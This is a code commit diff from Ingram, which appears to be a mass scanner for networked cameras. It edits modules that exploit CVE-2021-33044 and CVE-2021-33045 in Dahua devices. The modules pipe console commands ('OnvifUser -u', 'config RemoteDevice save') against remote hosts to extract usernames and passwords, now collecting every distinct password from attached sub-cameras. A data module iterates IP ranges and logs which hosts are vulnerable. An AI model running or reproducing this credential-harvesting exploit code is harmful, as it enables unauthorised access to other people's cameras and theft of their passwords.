stash

Author: jorhelp

Diff for: Ingram/VDB/CVE_2021_33044.py

@@ -7,25 +7,34 @@
 
 from Ingram.utils import config
 from Ingram.utils import logger
+from Ingram.utils import run_cmd
 
 
 def dh_console(ip, port, proto='dhip'):
     CWD = os.path.dirname(os.path.abspath(__file__))
     console = os.path.join(CWD, 'lib/DahuaConsole/Console.py')
     user, passwd = '', ''
     try:
-        with os.popen(f"""
-        (
+        # with os.popen(f"""
+        # (
+        #     echo "OnvifUser -u"
+        #     echo "quit all"
+        # ) | python -Bu {console} --logon netkeyboard --rhost {ip} --rport {port} --proto {proto} 2>/dev/null
+        # """) as f: items = [line.strip() for line in f]
+        cmd = f"""(
             echo "OnvifUser -u"
             echo "quit all"
         ) | python -Bu {console} --logon netkeyboard --rhost {ip} --rport {port} --proto {proto} 2>/dev/null
-        """) as f: items = [line.strip() for line in f]
-        logger.debug(items)
-        for idx, val in enumerate(items):
-            if 'Name' in val:
-                user = val.split(':')[-1].strip().strip(',').replace('"', '') 
-                passwd = items[idx + 1].split(':')[-1].strip().strip(',').replace('"', '')
-                break
+        """
+        code, msg = run_cmd(cmd)
+        if code == 0:
+            items = msg.split('\n')
+            logger.debug(items)
+            for idx, val in enumerate(items):
+                if 'Name' in val:
+                    user = val.split(':')[-1].strip().strip(',').replace('"', '') 
+                    passwd = items[idx + 1].split(':')[-1].strip().strip(',').replace('"', '')
+                    break
     except Exception as e:
         logger.error(e)
     return user, passwd

Diff for: Ingram/VDB/CVE_2021_33045.py

@@ -7,6 +7,7 @@
 
 from Ingram.utils import config
 from Ingram.utils import logger
+from Ingram.utils import run_cmd
 
 
 def cve_2021_33045(ip: str) -> list:
@@ -18,12 +19,19 @@ def cve_2021_33045(ip: str) -> list:
     json_file = os.path.join(OUT, f"{ip}-{port}-users.json")
 
     try:
-        with os.popen(f"""
+        # with os.popen(f"""
+        # (
+        #     echo "config RemoteDevice save {json_file}"
+        #     echo "quit all"
+        # ) | python -Bu {console} --logon loopback --rhost {ip} --rport {port} --proto dhip 2>/dev/null
+        # """) as f: items = f.readlines()
+        cmd = f"""
         (
             echo "config RemoteDevice save {json_file}"
             echo "quit all"
         ) | python -Bu {console} --logon loopback --rhost {ip} --rport {port} --proto dhip 2>/dev/null
-        """) as f: items = f.readlines()
+        """
+        code, msg = run_cmd(cmd)
 
         # success
         if os.path.exists(json_file):
@@ -32,9 +40,13 @@ def cve_2021_33045(ip: str) -> list:
             dev_all = info['params']['table'].values()
             dev_alive = [i for i in dev_all if i['Enable']]
             user = dev_alive[0]['UserName']
-            passwd = dev_alive[0]['Password']
-            os.remove(json_file)
-            return [True, user, passwd, 'cve-2021-33045', len(dev_alive)]
+            passwds = [i['Password'] for i in dev_alive if i['Password'] != '']
+            passwds = list(set(passwds))
+            # 子相机上有许多不同的密码，但是这些可能都和这台nvr的密码不一样
+            return [True, user, passwds[0], 'cve-2021-33045', len(dev_alive), passwds]
     except Exception as e:
         logger.error(e)
+    finally:
+        if os.path.exists(json_file):
+            os.remove(json_file)
     return [False, ]

Diff for: Ingram/core/data.py

@@ -1,15 +1,14 @@
-"""input output"""
+"""the data that produced by scanner and send to workshop"""
 import os
-import sys
-import pickle
 import hashlib
-from multiprocessing import Pool, Queue
+from multiprocessing import Pool
 
 from gevent.lock import RLock
 
 from Ingram.utils import color
 from Ingram.utils import logger
 from Ingram.utils import singleton
+from Ingram.utils import get_current_time
 from Ingram.utils import get_ip_seg_len, get_all_ip
 
 
@@ -19,9 +18,9 @@ class Data:
     def __init__(self, _input, output):
         self.input = _input
         self.output = output
-        self.msg_queue = Queue()
         self.var_lock = RLock()
         self.file_lock = RLock()
+        self.create_time = get_current_time()
         self.taskid = hashlib.md5((self.input + self.output).encode('utf-8')).hexdigest()
 
         self.total = 0
@@ -63,39 +62,75 @@ def preprocess(self):
 
         # the location to begin
         if self.done != 0:
-            current = 0
-            while self.lines:
-                line = self.lines.pop(0)
-                current += get_ip_seg_len(line)
-                if current == self.done:
-                    break
-                elif current < self.done:
-                    continue
-                else:
-                    ips = get_all_ip(line)
-                    self.lines = ips[-(current - self.done):] + self.lines
-                    break
-            logger.debug(f"current: {current}, done: {self.done}, total: {self.total}")
+            for _ in range(self.done):
+                next(self.ip_generator)
+            #  current = 0
+            #  while self.lines:
+            #      line = self.lines.pop(0)
+            #      current += get_ip_seg_len(line)
+            #      if current == self.done:
+            #          break
+            #      elif current < self.done:
+            #          continue
+            #      else:
+            #          ips = get_all_ip(line)
+            #          self.lines = ips[-(current - self.done):] + self.lines
+            #          break
+            #  logger.debug(f"current: {current}, done: {self.done}, total: {self.total}")
 
         # found
         results_file = os.path.join(self.output, 'results.csv')
         if os.path.exists(results_file):
             with open(results_file, 'r') as f:
                 self.found = len([l for l in f if l.strip()])
 
-        self.vuls = open(results_file, 'a')
-        self.not_vuls = open(os.path.join(self.output, 'not_vulnerable.csv'), 'a')
+        self.vul = open(results_file, 'a')
+        self.not_vul = open(os.path.join(self.output, 'not_vulnerable.csv'), 'a')
 
     def ip_generate(self):
         for line in self.lines:
-            ips = get_all_ip(line)
-            for ip in ips:
-                yield ip
+            yield from get_all_ip(line)
+
+    def get_total(self):
+        with self.var_lock:
+            return self.total
+
+    def get_done(self):
+        with self.var_lock:
+            return self.done
+
+    def get_found(self):
+        with self.var_lock:
+            return self.found
+
+    def found_add(self):
+        with self.var_lock:
+            self.found += 1
+
+    def done_add(self):
+        with self.var_lock:
+            self.done += 1
+
+    def vul_add(self, item):
+        with self.file_lock:
+            self.vul.writelines(item)
+            self.vul.flush()
+
+    def not_vul_add(self, item):
+        with self.file_lock:
+            self.not_vul.writelines(item)
+            self.not_vul.flush()
+
+    def record_running_state(self):
+        # every 5 minutes
+        with self.var_lock:
+            time_interval = int(get_current_time() - self.create_time)
+            if time_interval % (5 * 60) == 0:
+                logger.info(f"#@#{self.taskid}#@#{self.done}#@#running state")
 
     def __del__(self):
-        try:  # if dont add try, sys.exit() may cause error
-            self.vuls.close()
-            self.not_vuls.close()
-            self.msg_queue.close()
+        try:  # if dont use try, sys.exit() may cause error
+            self.vul.close()
+            self.not_vul.close()
         except Exception as e:
             logger.error(e)